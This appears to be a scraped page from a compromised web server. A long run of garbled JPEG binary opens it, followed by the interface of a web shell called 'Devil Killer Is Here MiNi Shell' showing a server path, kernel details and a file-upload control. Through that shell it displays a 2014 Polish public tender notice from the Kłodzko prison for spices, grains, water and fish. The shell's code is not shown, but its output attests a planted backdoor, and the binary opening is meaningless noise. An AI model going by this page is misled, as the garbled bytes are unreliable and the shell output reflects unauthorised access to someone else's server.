JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141128/390926-N-2014.html

<p class="kh_header"><b>Kłodzko: DD/ZP 220/8/2014 POSTĘPOWANIE NA DOSTAWĘ ARTYKUŁÓW SPOŻYWCZYCH ORAZ RYB.</b><br>
<b>Numer ogłoszenia: 390926 - 2014; data zamieszczenia: 28.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Kłodzku , ul. Bohaterów Getta 16, 57-300 Kłodzko, woj. dolnośląskie, tel. 074 8651800, 8651854, faks 074 8673017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ZAKŁAD KARNY KŁODZKO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DD/ZP 220/8/2014 POSTĘPOWANIE NA DOSTAWĘ ARTYKUŁÓW SPOŻYWCZYCH ORAZ RYB..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Bulion grzybowy -CPV-15872200-3- opakowanie 1-20 kg;
2) Barszcz biały- CPV-158910000 opakowanie 1-5 kg;
3) Cynamon- CPV-15872000-1 opakowanie 1-5 kg;
4) Czosnek mielony- CPV-15332140-7 opakowanie 1-5 kg;
5) Jabłka prażone-   CPV -15000000-8 opakowanie od 10-12 kg;
6) Keczup- CPV-15871230-5 -opakowanie 1 kg;
7) Kminek- CPV-15872200-3 opakowanie 1-20 kg;
8) koperek suszony- CPV-1587000-7  opakowanie 0,5-1 kg;
9) Liść laurowy  CPV-1587000-7 opakowanie 0,5-1 kg;
10) Przyprawa do zup w płynie CPV-1587000-7 opakowanie 1-5 L;
11) Majeranek CPV 158910000 opakowanie 0,5 -5 kg;
12) Majonez CPV-15871273-8 -opakowanie 0,9 kg;
13) Musztarda CPV 15871270-7 -opakowanie 1 kg;
14) Ocet CPV-15871110-8-opakowanie 0,5-1 l;
15) Papryka CPV 15872100-2 opakowanie 1-5 kg;
16) Pieprz CPV 15871200-6-opakowanie 1-5 kg ;
17) Przecier ogórkowy CPV-153312000-7- opakowanie 0,9 kg
18) Przyprawa do kurczaka CPV-15871200-6 opakowanie od 1-5 kg;
19) Przyprawy sypkie -typ jarzynka CPV-15891000-0 opakowanie 1-5 kg; 
20) Rosół wołowy CPV-15872400-5 opakowanie 1-5 kg;
21) Sos pieczarkowy CPV-15870000-7 opakowanie 1-5 kg;
22) Sól CPV-15871260-4 opakowanie 1 kg;
23) Ziele angielskie CPV-15870000-7 opakowanie 1-5 kg;
24) Zupa pieczarkowa CPV 158910000 opakowanie od 1-5 kg;
25) Żurek CPV 15870000-7 opakowanie 1-5 kg;
26) Przyprawa do gulaszu CPV 158910000 opakowanie 0,1-1 kg.
27) Danie błyskawiczne CPV 15891400-4 opakowanie 0,6 0,7 kg, danie gotowe do spożycia po zalaniu wrzącą wodą z makaronem i sosem bolońskim (nie może to być zupa błyskawiczna) nie wymagające gotowania. Z jednej porcji opakowania powinna wyjść jedna porcja makaronu z gęstym sosem. Jedno opakowanie to danie dla jednej osoby. Opakowanie jednostkowe -torba polietylenowa spawana, torba foliowa (materiał opakowaniowy dopuszczony do kontaktu z żywnością) o masie od 60g do 80 g;o wydajności 100 g. zupy błyskawicznej = ok 500 ml gotowej zupy (do spożycia). Nie może to być zupa błyskawiczna typu rosół , pomidorowa, gulaszowa itp. Powinno to być danie do szybkiego spożycia pakowane z makaronem i przyprawami do opakowanie foliowego . Opakowanie jednostkowe torba polietylenowa spawana, torba foliowa (materiał opakowania dopuszczony do kontaktu z żywnością)
28) Herbata -CPV-15860000-4 opakowanie 1-25 kg
1) Dżem truskawkowy CPV-15332290-3 opakowanie od 5-15 kg;
2) Dżem wieloowocowy CPV 15332290-3 opakowanie od 5-15 kg;
3) Marmolada pomarańczowa CPV-156332231-2 opakowanie  od 5-15 kg ;
4) Syrop/zaprawa do napojów CPV 15831500-7 rozcieńczacz o smaku owocowym opakowanie szczelnie zamknięte o gramaturze od 0,5 do 5 l;
5) cukier - opakowanie jednostkowe od 1-10 kg 
1) Ryż CPV 15614100-6 biały długoziarnisty opakowanie od 1-20 kg;
2) Fasola CPV-03221210-1 -biała opakowanie od 5-20 kg;
3) Groch CPV 03221220-4 -łuskany opakowanie od 5-20 kg;
4) Mąka Pszenna CPV-15614100-6 typ 450-550 opakowanie od 1-20 kg;
5) Mąka ziemniaczana CPV 15620000-0 opakowanie od 1-20 kg ;
6) Płatki owsiane CPV 15613380-5 opakowanie od 0,5-10 kg; 
7) Makaron Krajanka CPV 15613300-1 opakowanie od 10-20 kg;
8) Makaron świderki CPV-15613300-1 opakowanie od 10-20 kg ;
9) Makaron łazanki CPV-15613300-1 opakowanie od 10-20 kg;
10) Bułka tarta CPV 15811500-1 opakowanie od 0,5-5 kg;
11) Kasza jęczmienna CPV-15613000-8 średnia opakowanie od 5-20 kg;
12) Kasza manna CPV 15613000-8 opakowanie od 1-20 kg;
13) Kotlet sojowy CPV-15610000-7 opakowanie od 10-25 kg;
14) Kostka sojowa CPV 15610000-7 opakowanie od 10-25 kg;
15) Granulat sojowy CPV-15610000-7 opakowanie od 10-25 kg;
16) Kawa zbożowa CPV-15862000-8 opakowanie od 0,5 kg do 25 kg  
1) Woda mineralna CPV 15981200-0 opakowanie jednostkowe 1,5 l.
1) Ryby filet mrożony- CPV-15211000-0 część ryby w postaci płatu mięsa , nie zawierająca ości, skór, płetw i głowy, mrożona z max ilością glazury do 10 % 
2) burgery rybne CPV-15240000-2 - mrożony kotlet rybny w gotowej panierce w kształcie prostokąta o wymiarze nie przekraczającym 10 cm..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę Zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę Zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę Zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę Zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia w/w warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonych przez wykonawcę dokumentów. Nie dołączenie któregokolwiek z dokumentów do oferty będzie skutkowało odrzuceniem oferty, jeżeli oferent nie odpowie na prośbę Zamawiającego o wyjaśnienie lub uzupełnienie oferty w wyznaczonym terminie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6. Z Zastrzeżeniem art 144 ustawy  Prawo Zamówień Publicznych zamawiający dopuszcza    
możliwość zmiany postanowień zawartej umowy z zachowaniem następujących uwarunkowań:
1) wszelkie zmiany dopuszcza się nie wcześniej niż po upływie połowy okresu na jaki została 
2) zawarta umowa.
3) Wszelkich zmian zawartej umowy można dokonać tylko jeden raz w trakcie trwania umowy.
4) Zmian dokonuje się na pisemny wniosek zamawiającego który powinien zawierać
5) szczegółową analizę warunków rynkowych oraz wszelką dokumentację (kserokopie pism producentów , innych dostawców itp.) potwierdzającą zmiany na jakie powołuje się Dostawca
6) Koszty Transportu i paliwa nie mogą być podstawą do występowania z wnioskiem o zmianę ceny przedmiotu zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> WWW.SW.GOV.PL<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZAKŁAD KARNY KŁODZKO 
UKL. BOH. GETTA 16
57-300 KŁODZKO.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.12.2014 godzina 11:00, miejsce: ZAKŁAD KARNY KŁODZKO 
UKL. BOH. GETTA 16
57-300 KŁODZKO.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)bulion grzybowy -CPV-15872200-3- opakowanie 1-20 kg;
2) Barszcz biały- CPV-158910000 opakowanie 1-5 kg;
3) Cynamon- CPV-15872000-1 opakowanie 1-5 kg;
4) Czosnek mielony- CPV-15332140-7 opakowanie 1-5 kg;
5) Jabłka prażone-   CPV -15000000-8 opakowanie od 10-12 kg;
6) Keczup- CPV-15871230-5 -opakowanie 1 kg;
7) Kminek- CPV-15872200-3 opakowanie 1-20 kg;
8) koperek suszony- CPV-1587000-7  opakowanie 0,5-1 kg;
9) Liść laurowy  CPV-1587000-7 opakowanie 0,5-1 kg;
10) Przyprawa do zup w płynie CPV-1587000-7 opakowanie 1-5 L;
11) Majeranek CPV 158910000 opakowanie 0,5 -5 kg;
12) Majonez CPV-15871273-8 -opakowanie 0,9 kg;
13) Musztarda CPV 15871270-7 -opakowanie 1 kg;
14) Ocet CPV-15871110-8-opakowanie 0,5-1 l;
15) Papryka CPV 15872100-2 opakowanie 1-5 kg;
16) Pieprz CPV 15871200-6-opakowanie 1-5 kg ;
17) Przecier ogórkowy CPV-153312000-7- opakowanie 0,9 kg
18) Przyprawa do kurczaka CPV-15871200-6 opakowanie od 1-5 kg;
19) Przyprawy sypkie -typ jarzynka CPV-15891000-0 opakowanie 1-5 kg; 
20) Rosół wołowy CPV-15872400-5 opakowanie 1-5 kg;
21) Sos pieczarkowy CPV-15870000-7 opakowanie 1-5 kg;
22) Sól CPV-15871260-4 opakowanie 1 kg;
23) Ziele angielskie CPV-15870000-7 opakowanie 1-5 kg;
24) Zupa pieczarkowa CPV 158910000 opakowanie od 1-5 kg;
25) Żurek CPV 15870000-7 opakowanie 1-5 kg;
26) Przyprawa do gulaszu CPV 158910000 opakowanie 0,1-1 kg.
27) Danie błyskawiczne CPV 15891400-4 opakowanie 0,6 0,7 kg, danie gotowe do spożycia po zalaniu wrzącą wodą z makaronem i sosem bolońskim (nie może to być zupa błyskawiczna) nie wymagające gotowania. Z jednej porcji opakowania powinna wyjść jedna porcja makaronu z gęstym sosem. Jedno opakowanie to danie dla jednej osoby. Opakowanie jednostkowe -torba polietylenowa spawana, torba foliowa (materiał opakowaniowy dopuszczony do kontaktu z żywnością) o masie od 60g do 80 g;o wydajności 100 g. zupy błyskawicznej = ok 500 ml gotowej zupy (do spożycia). Nie może to być zupa błyskawiczna typu rosół , pomidorowa, gulaszowa itp. Powinno to być danie do szybkiego spożycia pakowane z makaronem i przyprawami do opakowanie foliowego . Opakowanie jednostkowe torba polietylenowa spawana, torba foliowa (materiał opakowania dopuszczony do kontaktu z żywnością)
28) Herbata -CPV-15860000-4 opakowanie 1-25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.14.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> CUKRY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Dżem truskawkowy CPV-15332290-3 opakowanie od 5-15 kg;
2) Dżem wieloowocowy CPV 15332290-3 opakowanie od 5-15 kg;
3) Marmolada pomarańczowa CPV-156332231-2 opakowanie  od 5-15 kg ;
4) Syrop/zaprawa do napojów CPV 15831500-7 rozcieńczacz o smaku owocowym opakowanie szczelnie zamknięte o gramaturze od 0,5 do 5 l;
5) cukier - opakowanie jednostkowe od 1-10 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.22.90-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> ZBOŻOWE-STRĄCZKOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Ryż CPV 15614100-6 biały długoziarnisty opakowanie od 1-20 kg;
2) Fasola CPV-03221210-1 -biała opakowanie od 5-20 kg;
3) Groch CPV 03221220-4 -łuskany opakowanie od 5-20 kg;
4) Mąka Pszenna CPV-15614100-6 typ 450-550 opakowanie od 1-20 kg;
5) Mąka ziemniaczana CPV 15620000-0 opakowanie od 1-20 kg ;
6) Płatki owsiane CPV 15613380-5 opakowanie od 0,5-10 kg; 
7) Makaron Krajanka CPV 15613300-1 opakowanie od 10-20 kg;
8) Makaron świderki CPV-15613300-1 opakowanie od 10-20 kg ;
9) Makaron łazanki CPV-15613300-1 opakowanie od 10-20 kg;
10) Bułka tarta CPV 15811500-1 opakowanie od 0,5-5 kg;
11) Kasza jęczmienna CPV-15613000-8 średnia opakowanie od 5-20 kg;
12) Kasza manna CPV 15613000-8 opakowanie od 1-20 kg;
13) Kotlet sojowy CPV-15610000-7 opakowanie od 10-25 kg;
14) Kostka sojowa CPV 15610000-7 opakowanie od 10-25 kg;
15) Granulat sojowy CPV-15610000-7 opakowanie od 10-25 kg;
16) Kawa zbożowa CPV-15862000-8 opakowanie od 0,5 kg do 25 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WODA MINERALNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Woda mineralna CPV 15981200-0 opakowanie jednostkowe 1,5 l..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Ryby filet mrożony- CPV-15211000-0 część ryby w postaci płatu mięsa , nie zawierająca ości, skór, płetw i głowy, mrożona z max ilością glazury do 10 % 
2) burgery rybne CPV-15240000-2 - mrożony kotlet rybny w gotowej panierce w kształcie prostokąta o wymiarze nie przekraczającym 10 cm..</p></li>
